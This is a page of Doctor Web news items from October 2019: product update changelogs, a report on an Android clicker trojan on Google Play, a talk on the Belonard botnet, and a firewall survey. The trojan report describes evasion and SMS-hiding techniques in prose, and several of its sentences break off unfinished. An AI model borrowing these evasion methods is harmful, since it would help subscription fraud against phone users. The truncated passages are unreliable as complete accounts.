All the news
October 21, 2019
Changes made to Dr.Web Firewall for Windows driver:
- An issue causing user-defined application blocking rules to be ignored has been resolved.
Changes made to Dr.Web Scanning Engine:
- A scanning service defect was eliminated. The issue in question, which occurred when the option to scan local networks was enabled, prevented files from being restored to their previous versions from their respective shadow copies on the server.
Changes made to Dr.Web Anti-rootkit API:
- Enhanced threat detection and neutralisation routines.
Changes made to Dr.Web Protection for Windows:
- A problem has been fixed that rendered the self-protection module non-operational if Dallas Lock software was being used alongside Dr.Web in a system.
Changes made to the Dr.Web Net Filtering Service:
- Problems occurring when the Mikrotik router web interface was being accessed have been fixed;
- An issue preventing the Your Phone application on Windows 10 PCs from establishing a connection to Android devices has been resolved;
- Also resolved was a problem preventing other nodes from appearing in the network neighbourhood under Windows 10.
Changes made to Dr.Web for Outlook Plugin:
- The routines that block outgoing malicious attachments have been upgraded;
- Adjustments have been made to the routines that process emails with attachments to avoid SpIDer Guard file monitor issues.
The update will be performed automatically; however, a system reboot will be required.
October 17, 2019
Specifically, it addresses an issue preventing the UI from displaying properly in Dark Mode under macOS 10.14 and later.
To update Dr.Web Light for macOS to version 11.0.1, go to the Mac App Store and in the Update section, click Update next to the product name. Dr.Web Light for macOS users can update the product free of charge.
Please note that Dr.Web Light for macOS has a limited set of features. To fully protect your Mac, use Dr.Web for macOS.
October 17, 2019
Virus analysts have identified several modifications of this malicious code, dubbed
Apart from that, all malware was protected by the commercial Jiagu packer, which makes it harder for antiviruses to detect them and hinders the code analysis. Thus, the trojan was more likely to avoid detection by the built-in security tools of Google Play.
Besides, virus writers tried to disguise the trojan as well-known advertising and analytics libraries. After being added to the host software, it embedded itself in the Facebook and Adjust SDKs, hiding among their components.
The clicker attacked users selectively; it did not perform any malicious actions if the potential victim was not residing in one of the attackers’ countries of interest.
See below examples of apps with this trojan:
Upon installation and launch, the clicker (hereinafter, we will take its modification
If the user grants it the permissions, the trojan will be able to hide all notifications about incoming text messages and hook them.
Next, the clicker sends the technical data about the infected device to the command and control server and checks the serial number of the victim’s SIM card. If it corresponds to one of the target countries,
If the victim’s SIM card is not registered in a country of interest, the trojan does not take any action and stops its malicious activity. The studied modifications attack residents of the following states:
After transmitting the number,
After receiving a website address,
Even though the clicker is not designed to work with text messages and has no access to them, it bypasses the restriction as follows. The trojan service monitors notifications from the default application that works with text messages. When there is an incoming message, the service hides the system notification. Then it hooks the information about the received text from the notification and transmits it to the trojan broadcast receiver. As a result, the user does not see any notifications about incoming texts and does not know what is happening. They only know about the subscription when money withdraws from their account, or if they go to the message menu and see texts related to the premium service.
Doctor Web experts have contacted Google and the detected malicious applications were removed from Google Play. All known modifications of this clicker are successfully detected and removed by Dr.Web for Android and do not pose any threat to our users.
#Android, #Google_Play, #clicker, #paid_subscription
October 16, 2019
Usually when it comes to threats related to video games, the first thing we talk about is stolen accounts. However, there exists another kind of danger, one many security researchers often overlook—an entire industry of underground services is at work promoting game servers. More often than not, illegal methods are involved, including infecting game clients. The Trojan.Belonard botnet was designed to promote servers running Counter Strike 1.6.
On November 8, at the Conference, Igor Zdobnov, Doctor Web’s chief malware researcher, and his colleague, Ivan Korolev, will talk at length about the Trojan.Belonard threat. Doctor Web has conducted thorough research on this threat. The company published published the results on its website in March 2019. By leveraging a Counter Strike client vulnerability, the botnet makers herded infected machines into their infrastructure in order to promote game servers for a fee. Thanks to the efforts of our security researchers, Dr.Web is now able to detect all the Trojan’s modules, rendering it incapable of posing a threat to users whose systems are protected by Dr.Web.
#video_games #conferences #botnet
October 14, 2019
Many users, especially inexperienced ones, opt not to install the firewall when installing Dr.Web anti-virus products because this component periodically displays messages that require a response, thereby allegedly distracting users so frequently that they can’t work in peace on the Internet.
Dr.Web Firewall indeed operates according to the rules and settings users configure for it. Usually, the rules are established during the "dialogue" that takes place between the user and the application: the firewall issues requests for program network access, and its owner decides whether to allow the connection or not. That is why it is very important to be extremely meticulous when working with the firewall; programs used should only be given the network access permissions they need.
The new project in the “Configure Dr.Web” series is devoted to properly configuring Dr.Web Firewall, and all Dr.Web users are invited to participate. We invite IT professionals involved in administering Dr.Web products for business, as well as Dr.Web Security Space and Dr.Web Anti-virus users, to test how well they know how to configure this Dr.Web component. Answering the survey questions will help participants learn more about the firewall’s features and show them that it is an important tool for keeping them safe on the Internet. Doctor Web will award each participant with 100 Dr.Weblings as a “thank you” for spending time answering the survey questions.
#firewall_configuration #Configure_Dr.Web #survey
October 10, 2019
The updated modules include Dr.Web Anti-rootkit API (126.96.36.199910080), Dr.Web Scanning Engine (188.8.131.52910020), and Dr.Web Protection for Windows (12.05.01.09250).
In addition, the anti-rootkit scan false positive REG:SUSPICIOUS.UserinitCorrupted has been eliminated.Furthermore, an anti-rootkit module issue that made it difficult to neutralise threats discovered in Task Scheduler has been resolved.
Both the paid and the free editions of the utility have been updated.